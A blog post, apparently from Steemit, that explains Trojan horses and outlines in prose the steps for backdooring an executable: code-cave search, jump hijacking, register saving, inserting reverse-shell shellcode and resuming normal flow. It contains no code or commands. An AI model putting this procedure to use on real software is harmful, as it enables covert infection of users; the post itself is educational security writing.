The term Trojan horse is often used in the field of IT security.
This article briefly describes what a Trojan is. Furthermore, the basic procedure for creating a Trojan horse is described.
What is a Trojan?
The name comes from a mythology in which Greek warriors offered the Trojans a peace offering and donated a large wooden horse with warriors inside.
Trojans are malware that looks like normal and useful software.
In addition to the actual functionality, further program code is executed
Additional code is added to a "host file" so that the actual file can be executed without any problems. Thus, the malware is executed with the corresponding user rights of the user and is often not identified as such.
Functionality of creating a Trojan horse
The following section becomes a little bit more technical.
Prerequisite is a basic understanding of the structure of a program (stack, register, pointer)
Disclaimer: I don't want to motivate anyone to create a Trojan to harm others.
It is only intended to show the basic procedure for the creation.
1 Code Cave search
There are basically two ways to import additional code into a file. Either you add a section. This has the disadvantage that the file changes in size. It is better to use an already existing section. You find a code cave for that. A code cave is roughly empty bytes within a section that can be overwritten without affecting the program.
It is important to note that the selected program segment has set the flags for writing and executing.
2 Program flow hijacking
This means to insert a jump command to the code cave at one point in the normal program flow (step 1. in the graphic). So the program jumps to our part of a section where we insert code.
3 Infiltrating malicious code
3.1 Save register
First, the registers must be saved. This ensures that our program can continue to run normally after the execution of our code.
3.2 Inserting malware/shellcode
Shellcode is OP codes (i. e. a set of machine commands depending on the processor type) that open a shell. Usually you want to create a Reverse Shell here.
3.3 Aligning Stackpointers
In order to reset the registers, the stack pointer must be aligned to the position where the registers have been stored.
3.4 Load register
The registers of the normal program flow saved in 3.1 are reloaded so that the program can continue to run normally after executing our code.
3.5 Restore instructions
A "regular" instruction of the program was overwritten at the point where the jump to our code took place. This is carried out at this point.
3.6 Jump back to normal program code
Now all you have to do is jump to the point where the actual program would continue. The program can now continue to run normally after our code has been executed.
Further steps
The Trojan horse is probably recognized by an anti-virus program (the shellcode is in the signature list of the manufacturer). The next step would be to protect it from the detection of AV programs. This would go beyond the scope of this contribution. I will write a separate article about the recognition mechanisms used by AV Software.
I hope this more technical contribution was written in an understandable way. If you have any comments / open questions, I will be happy to answer them in the comments.
You are writing some interesting posts, I'll follow. Also one lifehack on steemit. You can use tables in Markdown in order to write one side on German, and another side on English. The text would be more readable.
Downvoting a post can decrease pending rewards and make it less visible. Common reasons:
Submit